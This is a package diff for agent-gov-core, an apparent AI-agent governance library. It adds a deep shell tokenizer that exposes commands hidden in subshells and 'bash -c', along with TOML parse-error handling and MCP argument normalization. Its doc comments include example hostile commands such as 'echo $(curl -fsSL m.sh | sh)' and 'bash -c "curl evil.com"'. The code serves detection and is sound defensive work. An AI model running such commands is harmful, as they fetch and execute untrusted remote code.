+
const KNOWN_RUNTIMES = new Set([
|
|
78
|
+
'node', 'npx', 'npm', 'pnpm', 'yarn',
|
|
79
|
+
'python', 'python3', 'pip', 'pip3', 'pipx', 'uvx', 'uv',
|
|
80
|
+
'ruby', 'gem', 'bundle',
|
|
81
|
+
'perl', 'cpan',
|
|
82
|
+
'bash', 'sh', 'zsh', 'fish', 'powershell', 'pwsh',
|
|
83
|
+
'deno', 'bun', 'tsx', 'ts-node',
|
|
84
|
+
]);
|
|
51
85
|
function normalizePath(p) {
|
|
52
86
|
return p.trim().replace(/\\/g, '/').replace(/\/+$/, '');
|
|
53
87
|
}
|
|
@@ -59,6 +93,22 @@ function normalizePath(p) {
|
|
|
59
93
|
* (npx, uvx, pipx, node).
|
|
60
94
|
*/
|
|
61
95
|
const NEUTRAL_BOOLEAN_FLAGS = new Set(['-y', '--yes']);
|
|
96
|
+
/**
|
|
97
|
+
* Flags universally treated as boolean (no value follows) by the runners we
|
|
98
|
+
* care about. Listed so `canonicalizeArgs` doesn't greedily pair them with the
|
|
99
|
+
* next positional argument, which would conflate `--verbose pkg` with
|
|
100
|
+
* `--verbose=pkg`. Unlike NEUTRAL_BOOLEAN_FLAGS these stay in the canonical
|
|
101
|
+
* form — they're load-bearing (different identity vs. their absence) but
|
|
102
|
+
* standalone.
|
|
103
|
+
*
|
|
104
|
+
* Conservative — only flags where "takes a value" is essentially never their
|
|
105
|
+
* meaning in any CLI we'd see in an MCP config.
|
|
106
|
+
*/
|
|
107
|
+
const KNOWN_BOOLEAN_FLAGS = new Set([
|
|
108
|
+
'-v', '-V', '-q', '-h', '-d',
|
|
109
|
+
'--verbose', '--quiet', '--silent', '--debug', '--help', '--version',
|
|
110
|
+
'--force', '--dry-run', '--no-cache', '--no-color', '--no-progress', '--json',
|
|
111
|
+
]);
|
|
62
112
|
/**
|
|
63
113
|
* Sort *neutral* flag/value pairs so reordering doesn't change identity, but
|
|
64
114
|
* preserve the order of positional arguments (which are usually load-bearing —
|
|
@@ -87,6 +137,15 @@ function canonicalizeArgs(args) {
|
|
|
87
137
|
flagPairs.push([a.slice(0, eq), a.slice(eq + 1)]);
|
|
88
138
|
continue;
|
|
89
139
|
}
|
|
140
|
+
// Known-boolean flags never consume the next argument, so `--verbose pkg`
|
|
141
|
+
// leaves `pkg` as a positional rather than collapsing into a fake pair.
|
|
142
|
+
// Without this guard, reordering ['--host', 'localhost', '--verbose', 'pkg']
|
|
143
|
+
// vs ['--verbose', '--host', 'localhost', 'pkg'] produced different
|
|
144
|
+
// canonical strings because `--verbose` greedily ate the next non-flag.
|
|
145
|
+
if (KNOWN_BOOLEAN_FLAGS.has(a)) {
|
|
146
|
+
flagPairs.push([a, null]);
|
|
147
|
+
continue;
|
|
148
|
+
}
|
|
90
149
|
const next = filtered[i + 1];
|
|
91
150
|
if (next !== undefined && !next.startsWith('-')) {
|
|
92
151
|
flagPairs.push([a, next]);
|
|
@@ -0,0 +1,54 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Structured config-file parse error. Carries the 1-based line and column of
|
|
3
|
+
* the failure so consumers can emit a `*.config_syntax_error` Finding pointing
|
|
4
|
+
* at the exact spot without recomputing line numbers from the raw offset.
|
|
5
|
+
*
|
|
6
|
+
* Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
|
|
7
|
+
* {@link readTomlObject} populate the `parseError` field of their result with
|
|
8
|
+
* this type whenever they can resolve a byte offset from the underlying parser.
|
|
9
|
+
* When the underlying error lacks position info, the original `Error` is
|
|
10
|
+
* preserved unchanged.
|
|
11
|
+
*
|
|
12
|
+
* @example
|
|
13
|
+
* import { readTomlObject, ConfigParseError } from 'agent-gov-core';
|
|
14
|
+
* const { parseError } = readTomlObject('.codex/config.toml');
|
|
15
|
+
* if (parseError instanceof ConfigParseError) {
|
|
16
|
+
* emitFinding({
|
|
17
|
+
* kind: 'policy_mesh.config_syntax_error',
|
|
18
|
+
* location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
|
|
19
|
+
* message: parseError.message,
|
|
20
|
+
* });
|
|
21
|
+
* }
|
|
22
|
+
*/
|
|
23
|
+
export declare class ConfigParseError extends Error {
|
|
24
|
+
readonly line: number;
|
|
25
|
+
readonly column: number;
|
|
26
|
+
readonly rawOffset: number;
|
|
27
|
+
constructor(message: string, opts: {
|
|
28
|
+
line: number;
|
|
29
|
+
column: number;
|
|
30
|
+
rawOffset: number;
|
|
31
|
+
cause?: Error;
|
|
32
|
+
});
|
|
33
|
+
}
|
|
34
|
+
/** Convert a 0-based byte offset to 1-based line and column. */
|
|
35
|
+
export declare function lineColumnOfOffset(text: string, offset: number): {
|
|
36
|
+
line: number;
|
|
37
|
+
column: number;
|
|
38
|
+
};
|
|
39
|
+
/**
|
|
40
|
+
* Extract a byte offset from a parser error message. Both this library's TOML
|
|
41
|
+
* parser ("at offset N") and Node's `JSON.parse` ("at position N", or a
|
|
42
|
+
* `position` property on newer runtimes) use compatible-enough formats that
|
|
43
|
+
* one helper handles both.
|
|
44
|
+
*
|
|
45
|
+
* Returns `null` when no offset can be recovered — most semantic errors
|
|
46
|
+
* (duplicate-key, table redefinition) don't include one.
|
|
47
|
+
*/
|
|
48
|
+
export declare function extractParseOffset(err: Error): number | null;
|
|
49
|
+
/**
|
|
50
|
+
* Wrap an arbitrary parser error into a {@link ConfigParseError} when offset
|
|
51
|
+
* recovery is possible; otherwise return the original error unchanged.
|
|
52
|
+
*/
|
|
53
|
+
export declare function toConfigParseError(text: string, err: Error): Error;
|
|
54
|
+
//# sourceMappingURL=parse-error.d.ts.map
|
|
@@ -0,0 +1,85 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Structured config-file parse error. Carries the 1-based line and column of
|
|
3
|
+
* the failure so consumers can emit a `*.config_syntax_error` Finding pointing
|
|
4
|
+
* at the exact spot without recomputing line numbers from the raw offset.
|
|
5
|
+
*
|
|
6
|
+
* Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
|
|
7
|
+
* {@link readTomlObject} populate the `parseError` field of their result with
|
|
8
|
+
* this type whenever they can resolve a byte offset from the underlying parser.
|
|
9
|
+
* When the underlying error lacks position info, the original `Error` is
|
|
10
|
+
* preserved unchanged.
|
|
11
|
+
*
|
|
12
|
+
* @example
|
|
13
|
+
* import { readTomlObject, ConfigParseError } from 'agent-gov-core';
|
|
14
|
+
* const { parseError } = readTomlObject('.codex/config.toml');
|
|
15
|
+
* if (parseError instanceof ConfigParseError) {
|
|
16
|
+
* emitFinding({
|
|
17
|
+
* kind: 'policy_mesh.config_syntax_error',
|
|
18
|
+
* location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
|
|
19
|
+
* message: parseError.message,
|
|
20
|
+
* });
|
|
21
|
+
* }
|
|
22
|
+
*/
|
|
23
|
+
export class ConfigParseError extends Error {
|
|
24
|
+
line;
|
|
25
|
+
column;
|
|
26
|
+
rawOffset;
|
|
27
|
+
constructor(message, opts) {
|
|
28
|
+
super(message);
|
|
29
|
+
this.name = 'ConfigParseError';
|
|
30
|
+
this.line = opts.line;
|
|
31
|
+
this.column = opts.column;
|
|
32
|
+
this.rawOffset = opts.rawOffset;
|
|
33
|
+
if (opts.cause) {
|
|
34
|
+
// Node 16.9+ supports the `cause` option on Error; some runtimes don't.
|
|
35
|
+
this.cause = opts.cause;
|
|
36
|
+
}
|
|
37
|
+
}
|
|
38
|
+
}
|
|
39
|
+
/** Convert a 0-based byte offset to 1-based line and column. */
|
|
40
|
+
export function lineColumnOfOffset(text, offset) {
|
|
41
|
+
const safe = Math.max(0, Math.min(offset, text.length));
|
|
42
|
+
let line = 1;
|
|
43
|
+
let column = 1;
|
|
44
|
+
for (let i = 0; i < safe; i++) {
|
|
45
|
+
if (text[i] === '\n') {
|
|
46
|
+
line++;
|
|
47
|
+
column = 1;
|
|
48
|
+
}
|
|
49
|
+
else {
|
|
50
|
+
column++;
|
|
51
|
+
}
|
|
52
|
+
}
|
|
53
|
+
return { line, column };
|
|
54
|
+
}
|
|
55
|
+
/**
|
|
56
|
+
* Extract a byte offset from a parser error message. Both this library's TOML
|
|
57
|
+
* parser ("at offset N") and Node's `JSON.parse` ("at position N", or a
|
|
58
|
+
* `position` property on newer runtimes) use compatible-enough formats that
|
|
59
|
+
* one helper handles both.
|
|
60
|
+
*
|
|
61
|
+
* Returns `null` when no offset can be recovered — most semantic errors
|
|
62
|
+
* (duplicate-key, table redefinition) don't include one.
|
|
63
|
+
*/
|
|
64
|
+
export function extractParseOffset(err) {
|
|
65
|
+
const m = /at (?:offset|position)\s+(\d+)/i.exec(err.message);
|
|
66
|
+
if (m)
|
|
67
|
+
return Number.parseInt(m[1], 10);
|
|
68
|
+
// Newer Node (≥21) attaches `position` to SyntaxError from JSON.parse.
|
|
69
|
+
const maybePos = err.position;
|
|
70
|
+
if (typeof maybePos === 'number')
|
|
71
|
+
return maybePos;
|
|
72
|
+
return null;
|
|
73
|
+
}
|
|
74
|
+
/**
|
|
75
|
+
* Wrap an arbitrary parser error into a {@link ConfigParseError} when offset
|
|
76
|
+
* recovery is possible; otherwise return the original error unchanged.
|
|
77
|
+
*/
|
|
78
|
+
export function toConfigParseError(text, err) {
|
|
79
|
+
const offset = extractParseOffset(err);
|
|
80
|
+
if (offset === null)
|
|
81
|
+
return err;
|
|
82
|
+
const { line, column } = lineColumnOfOffset(text, offset);
|
|
83
|
+
return new ConfigParseError(err.message, { line, column, rawOffset: offset, cause: err });
|
|
84
|
+
}
|
|
85
|
+
//# sourceMappingURL=parse-error.js.map
|
package/dist/shell.d.ts
CHANGED
|
@@ -12,6 +12,32 @@
|
|
|
12
12
|
* // → ['echo "; not a separator"']
|
|
13
13
|
*/
|
|
14
14
|
export declare function tokenizeShell(command: string): string[];
|
|
15
|
+
/**
|
|
16
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
17
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
18
|
+
* text:
|
|
19
|
+
*
|
|
20
|
+
* - Subshell `$(...)`
|
|
21
|
+
* - Backtick `` `...` ``
|
|
22
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
23
|
+
*
|
|
24
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
25
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
26
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
27
|
+
*
|
|
28
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
29
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
30
|
+
* arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
|
|
31
|
+
* not unquoted.
|
|
32
|
+
*
|
|
33
|
+
* @example
|
|
34
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
35
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
36
|
+
*
|
|
37
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
38
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
39
|
+
*/
|
|
40
|
+
export declare function tokenizeShellDeep(command: string): string[];
|
|
15
41
|
/**
|
|
16
42
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
17
43
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|
package/dist/shell.js
CHANGED
|
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
|
|
|
83
83
|
i += 2;
|
|
84
84
|
continue;
|
|
85
85
|
}
|
|
86
|
-
// Treat a single `&` (background) as a separator too
|
|
86
|
+
// Treat a single `&` (background) as a separator too — UNLESS preceded
|
|
87
|
+
// by `>` or `<`, in which case it's a file-descriptor redirection like
|
|
88
|
+
// `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
|
|
89
|
+
// detection on every command that redirects stderr to stdout.
|
|
87
90
|
if (c === '&') {
|
|
91
|
+
const prev = buf.trimEnd().slice(-1);
|
|
92
|
+
if (prev === '>' || prev === '<') {
|
|
93
|
+
buf += c;
|
|
94
|
+
i++;
|
|
95
|
+
continue;
|
|
96
|
+
}
|
|
88
97
|
pushPart(out, buf);
|
|
89
98
|
buf = '';
|
|
90
99
|
i++;
|
|
@@ -101,6 +110,206 @@ function pushPart(out, part) {
|
|
|
101
110
|
if (trimmed !== '')
|
|
102
111
|
out.push(trimmed);
|
|
103
112
|
}
|
|
113
|
+
/**
|
|
114
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
115
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
116
|
+
* text:
|
|
117
|
+
*
|
|
118
|
+
* - Subshell `$(...)`
|
|
119
|
+
* - Backtick `` `...` ``
|
|
120
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
121
|
+
*
|
|
122
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
123
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
124
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
125
|
+
*
|
|
126
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
127
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
128
|
+
* arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
|
|
129
|
+
* not unquoted.
|
|
130
|
+
*
|
|
131
|
+
* @example
|
|
132
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
133
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
134
|
+
*
|
|
135
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
136
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
137
|
+
*/
|
|
138
|
+
export function tokenizeShellDeep(command) {
|
|
139
|
+
const out = [];
|
|
140
|
+
const seen = new Set();
|
|
141
|
+
const visit = (cmd, depth) => {
|
|
142
|
+
if (depth > 8)
|
|
143
|
+
return; // guard against pathological nesting
|
|
144
|
+
// Extract nested payloads from the WHOLE command first — `tokenizeShell`
|
|
145
|
+
// splits on `|` regardless of paren depth, so `$(curl m.sh | sh)` would
|
|
146
|
+
// already be cut in two by the time we tried to walk it for `$(…)`.
|
|
147
|
+
const nested = extractNestedShellPayloads(cmd);
|
|
148
|
+
for (const sub of tokenizeShell(cmd)) {
|
|
149
|
+
if (!seen.has(sub)) {
|
|
150
|
+
seen.add(sub);
|
|
151
|
+
out.push(sub);
|
|
152
|
+
}
|
|
153
|
+
}
|
|
154
|
+
for (const n of nested) {
|
|
155
|
+
visit(n, depth + 1);
|
|
156
|
+
}
|
|
157
|
+
};
|
|
158
|
+
visit(command, 0);
|
|
159
|
+
return out;
|
|
160
|
+
}
|
|
161
|
+
/**
|
|
162
|
+
* Return all shell-evaluation payloads embedded in a single subcommand:
|
|
163
|
+
* - `$(…)` and `` `…` `` bodies (paren/backtick balanced)
|
|
164
|
+
* - `(bash|sh|zsh|python|python3|perl|ruby|node) -c <quoted-string>` payloads
|
|
165
|
+
* The payloads are returned UNQUOTED but otherwise raw.
|
|
166
|
+
*/
|
|
167
|
+
function extractNestedShellPayloads(subcommand) {
|
|
168
|
+
const found = [];
|
|
169
|
+
const len = subcommand.length;
|
|
170
|
+
let i = 0;
|
|
171
|
+
let inSingle = false;
|
|
172
|
+
let inDouble = false;
|
|
173
|
+
// Pre-compiled here so we can use it inside the quote-aware walk.
|
|
174
|
+
const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
|
|
175
|
+
while (i < len) {
|
|
176
|
+
const c = subcommand[i];
|
|
177
|
+
// Plain single quotes: nothing inside is shell-interpreted
|
|
178
|
+
if (inSingle) {
|
|
179
|
+
if (c === "'")
|
|
180
|
+
inSingle = false;
|
|
181
|
+
i++;
|
|
182
|
+
continue;
|
|
183
|
+
}
|
|
184
|
+
if (c === "'") {
|
|
185
|
+
inSingle = true;
|
|
186
|
+
i++;
|
|
187
|
+
continue;
|
|
188
|
+
}
|
|
189
|
+
// Inside double quotes, `$(…)` and backticks STILL evaluate, so we
|
|
190
|
+
// keep scanning. Just remember to re-enable detection of an outer
|
|
191
|
+
// closing `"`.
|
|
192
|
+
if (c === '"') {
|
|
193
|
+
inDouble = !inDouble;
|
|
194
|
+
i++;
|
|
195
|
+
continue;
|
|
196
|
+
}
|
|
197
|
+
// $(...)
|
|
198
|
+
if (c === '$' && subcommand[i + 1] === '(') {
|
|
199
|
+
const body = readBalanced(subcommand, i + 2, '(', ')');
|
|
200
|
+
if (body !== null) {
|
|
201
|
+
found.push(body.content);
|
|
202
|
+
i = body.endIndex;
|
|
203
|
+
continue;
|
|
204
|
+
}
|
|
205
|
+
}
|
|
206
|
+
// Backticks
|
|
207
|
+
if (c === '`') {
|
|
208
|
+
const close = subcommand.indexOf('`', i + 1);
|
|
209
|
+
if (close !== -1) {
|
|
210
|
+
found.push(subcommand.slice(i + 1, close));
|
|
211
|
+
i = close + 1;
|
|
212
|
+
continue;
|
|
213
|
+
}
|
|
214
|
+
}
|
|
215
|
+
// `bash -c "..."` and friends — checked only OUTSIDE quoted regions so
|
|
216
|
+
// `echo "bash -c \"curl evil\""` (data, not a command) doesn't trigger.
|
|
217
|
+
// Match boundary: only at start-of-string OR after whitespace / a chain
|
|
218
|
+
// separator.
|
|
219
|
+
if (!inDouble) {
|
|
220
|
+
const atBoundary = i === 0 || /[\s;|&]/.test(subcommand[i - 1]);
|
|
221
|
+
if (atBoundary) {
|
|
222
|
+
const tail = subcommand.slice(i);
|
|
223
|
+
const dashCMatch = dashCMatcher.exec(tail);
|
|
224
|
+
if (dashCMatch) {
|
|
225
|
+
const afterFlag = i + dashCMatch[0].length;
|
|
226
|
+
const payload = readQuotedArg(subcommand, afterFlag);
|
|
227
|
+
if (payload !== null)
|
|
228
|
+
found.push(payload);
|
|
229
|
+
// Skip past the matched `bash -c ` prefix so the walk continues
|
|
230
|
+
// from the argument position; we don't try to compute where the
|
|
231
|
+
// quoted arg ends (the next iteration will hit the quote and toggle
|
|
232
|
+
// inDouble naturally).
|
|
233
|
+
i = afterFlag;
|
|
234
|
+
continue;
|
|
235
|
+
}
|
|
236
|
+
}
|
|
237
|
+
}
|
|
238
|
+
i++;
|
|
239
|
+
}
|
|
240
|
+
return found;
|
|
241
|
+
}
|
|
242
|
+
/** Read a balanced `open`/`close` body starting at `start` (already past the open). */
|
|
243
|
+
function readBalanced(input, start, open, close) {
|
|
244
|
+
let depth = 1;
|
|
245
|
+
let i = start;
|
|
246
|
+
let inSingle = false;
|
|
247
|
+
let inDouble = false;
|
|
248
|
+
while (i < input.length) {
|
|
249
|
+
const c = input[i];
|
|
250
|
+
if (inSingle) {
|
|
251
|
+
if (c === "'")
|
|
252
|
+
inSingle = false;
|
|
253
|
+
i++;
|
|
254
|
+
continue;
|
|
255
|
+
}
|
|
256
|
+
if (c === "'") {
|
|
257
|
+
inSingle = true;
|
|
258
|
+
i++;
|
|
259
|
+
continue;
|
|
260
|
+
}
|
|
261
|
+
if (c === '"') {
|
|
262
|
+
inDouble = !inDouble;
|
|
263
|
+
i++;
|
|
264
|
+
continue;
|
|
265
|
+
}
|
|
266
|
+
if (!inDouble) {
|
|
267
|
+
if (c === open)
|
|
268
|
+
depth++;
|
|
269
|
+
else if (c === close) {
|
|
270
|
+
depth--;
|
|
271
|
+
if (depth === 0)
|
|
272
|
+
return { content: input.slice(start, i), endIndex: i + 1 };
|
|
273
|
+
}
|
|
274
|
+
}
|
|
275
|
+
i++;
|
|
276
|
+
}
|
|
277
|
+
return null;
|
|
278
|
+
}
|
|
279
|
+
/**
|
|
280
|
+
* Read the next quoted (single, double) or bare token starting at `start`,
|
|
281
|
+
* returning its unquoted contents.
|
|
282
|
+
*/
|
|
283
|
+
function readQuotedArg(input, start) {
|
|
284
|
+
let i = start;
|
|
285
|
+
while (i < input.length && (input[i] === ' ' || input[i] === '\t'))
|
|
286
|
+
i++;
|
|
287
|
+
if (i >= input.length)
|
|
288
|
+
return null;
|
|
289
|
+
const q = input[i];
|
|
290
|
+
if (q === '"' || q === "'") {
|
|
291
|
+
let j = i + 1;
|
|
292
|
+
let buf = '';
|
|
293
|
+
while (j < input.length) {
|
|
294
|
+
const c = input[j];
|
|
295
|
+
if (c === '\\' && q === '"' && j + 1 < input.length) {
|
|
296
|
+
buf += input[j + 1];
|
|
297
|
+
j += 2;
|
|
298
|
+
continue;
|
|
299
|
+
}
|
|
300
|
+
if (c === q)
|
|
301
|
+
return buf;
|
|
302
|
+
buf += c;
|
|
303
|
+
j++;
|
|
304
|
+
}
|
|
305
|
+
return null;
|
|
306
|
+
}
|
|
307
|
+
// Bare token — read up to whitespace
|
|
308
|
+
let j = i;
|
|
309
|
+
while (j < input.length && input[j] !== ' ' && input[j] !== '\t')
|
|
310
|
+
j++;
|
|
311
|
+
return input.slice(i, j);
|
|
312
|
+
}
|
|
104
313
|
/**
|
|
105
314
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
106
315
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|
package/dist/toml.js
CHANGED
|
@@ -1,4 +1,5 @@
|
|
|
1
1
|
import { readFileSync } from 'node:fs';
|
|
2
|
+
import { toConfigParseError } from './parse-error.js';
|
|
2
3
|
export function readTomlObject(path) {
|
|
3
4
|
const text = readFileSync(path, 'utf8');
|
|
4
5
|
try {
|
|
@@ -6,7 +7,7 @@ export function readTomlObject(path) {
|
|
|
6
7
|
return { value: parsed, toml: parsed, text };
|
|
7
8
|
}
|
|
8
9
|
catch (err) {
|
|
9
|
-
return { value: undefined, toml: undefined, text, parseError: err };
|
|
10
|
+
return { value: undefined, toml: undefined, text, parseError: toConfigParseError(text, err) };
|
|
10
11
|
}
|
|
11
12
|
}
|
|
12
13
|
/**
|
|
@@ -122,11 +123,11 @@ class TomlParser {
|
|
|
122
123
|
// TOML spec violation. Without this guard, `[foo]` silently descended
|
|
123
124
|
// into the last `[[foo]]` entry and let writes leak into it.
|
|
124
125
|
if (this.aotPaths.has(path)) {
|
|
125
|
-
throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}]`);
|
|
126
|
+
throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}] at offset ${this.pos}`);
|
|
126
127
|
}
|
|
127
128
|
const table = this.descendTablePath(keys, /*forHeader*/ true);
|
|
128
129
|
if (this.definedTables.has(path)) {
|
|
129
|
-
throw new Error(`Duplicate table definition: [${keys.join('.')}]`);
|
|
130
|
+
throw new Error(`Duplicate table definition: [${keys.join('.')}] at offset ${this.pos}`);
|
|
130
131
|
}
|
|
131
132
|
this.definedTables.add(path);
|
|
132
133
|
this.current = table;
|
|
@@ -153,6 +154,17 @@ class TomlParser {
|
|
|
153
154
|
else if (!Array.isArray(arr)) {
|
|
154
155
|
throw new Error(`Key ${keys.join('.')} is not an array-of-tables`);
|
|
155
156
|
}
|
|
157
|
+
// Each new array entry resets the "already defined" status of any subtables
|
|
158
|
+
// declared under this AOT path. TOML spec permits the same subtable header
|
|
159
|
+
// (`[fruits.physical]`) to reappear under each fresh `[[fruits]]` entry — it
|
|
160
|
+
// binds to the current array entry. Without this clearing, the v0.4.2
|
|
161
|
+
// definedTables guard rejected the second [fruits.physical] as a duplicate.
|
|
162
|
+
const aotPathPrefix = keys.join(this.PATH_KEY_SEPARATOR) + this.PATH_KEY_SEPARATOR;
|
|
163
|
+
for (const definedPath of this.definedTables) {
|
|
164
|
+
if (definedPath.startsWith(aotPathPrefix)) {
|
|
165
|
+
this.definedTables.delete(definedPath);
|
|
166
|
+
}
|
|
167
|
+
}
|
|
156
168
|
const newTable = {};
|
|
157
169
|
arr.push(newTable);
|
|
158
170
|
this.current = newTable;
|
|
@@ -248,7 +260,7 @@ class TomlParser {
|
|
|
248
260
|
}
|
|
249
261
|
const lastKey = keys[keys.length - 1];
|
|
250
262
|
if (Object.prototype.hasOwnProperty.call(node, lastKey)) {
|
|
251
|
-
throw new Error(`Duplicate key: ${keys.join('.')}`);
|
|
263
|
+
throw new Error(`Duplicate key: ${keys.join('.')} at offset ${this.pos}`);
|
|
252
264
|
}
|
|
253
265
|
node[lastKey] = value;
|
|
254
266
|
this.expectLineEnd();
|
|
@@ -322,9 +334,18 @@ class TomlParser {
|
|
|
322
334
|
const c = this.src[this.pos];
|
|
323
335
|
if (c === '\\') {
|
|
324
336
|
this.pos++;
|
|
325
|
-
//
|
|
326
|
-
|
|
337
|
+
// Line-ending backslash: per TOML spec, a `\` followed by *any amount
|
|
338
|
+
// of inline whitespace* (spaces/tabs) and then a newline strips the
|
|
339
|
+
// newline and trims leading whitespace on the next line. Peek past
|
|
340
|
+
// trailing inline whitespace before deciding whether this is a
|
|
341
|
+
// line-ending backslash or a regular escape.
|
|
342
|
+
let peek = this.pos;
|
|
343
|
+
while (peek < this.len && (this.src[peek] === ' ' || this.src[peek] === '\t')) {
|
|
344
|
+
peek++;
|
|
345
|
+
}
|
|
346
|
+
const next = this.src[peek];
|
|
327
347
|
if (next === '\n' || next === '\r' || next === undefined) {
|
|
348
|
+
this.pos = peek;
|
|
328
349
|
while (this.pos < this.len &&
|
|
329
350
|
(this.src[this.pos] === ' ' ||
|
|
330
351
|
this.src[this.pos] === '\t' ||
|
|
@@ -480,7 +501,7 @@ class TomlParser {
|
|
|
480
501
|
// Without this guard, `{ host = "a", host = "b" }` silently parsed as
|
|
481
502
|
// `{ host: "b" }` instead of raising.
|
|
482
503
|
if (Object.prototype.hasOwnProperty.call(node, leaf)) {
|
|
483
|
-
throw new Error(`Duplicate key in inline table: ${keys.join('.')}`);
|
|
504
|
+
throw new Error(`Duplicate key in inline table: ${keys.join('.')} at offset ${this.pos}`);
|
|
484
505
|
}
|
|
485
506
|
node[leaf] = value;
|
|
486
507
|
this.skipInlineWhitespace();
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "agent-gov-core",
|
|
3
|
-
"version": "0.
|
|
3
|
+
"version": "0.5.0",
|
|
4
4
|
"description": "Shared primitives for the AI-agent governance suite: Finding schema, JSONC/TOML readers, line locators, MCP command normalization, shell tokenization, and GitHub Action helpers.",
|
|
5
5
|
"type": "module",
|
|
6
6
|
"main": "./dist/index.js",
|
|
@@ -41,6 +41,10 @@
|
|
|
41
41
|
}
|
|
42
42
|
},
|
|
43
43
|
"fingerprint": { "type": "string" },
|
|
44
|
+
"salientKey": {
|
|
45
|
+
"type": "string",
|
|
46
|
+
"description": "Optional discriminator that participates in the fingerprint hash. Set when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on one line). Use a stable value — package name, server name, rule id — not a timestamp."
|
|
47
|
+
},
|
|
44
48
|
"data": { "type": "object" }
|
|
45
49
|
}
|
|
46
50
|
}
|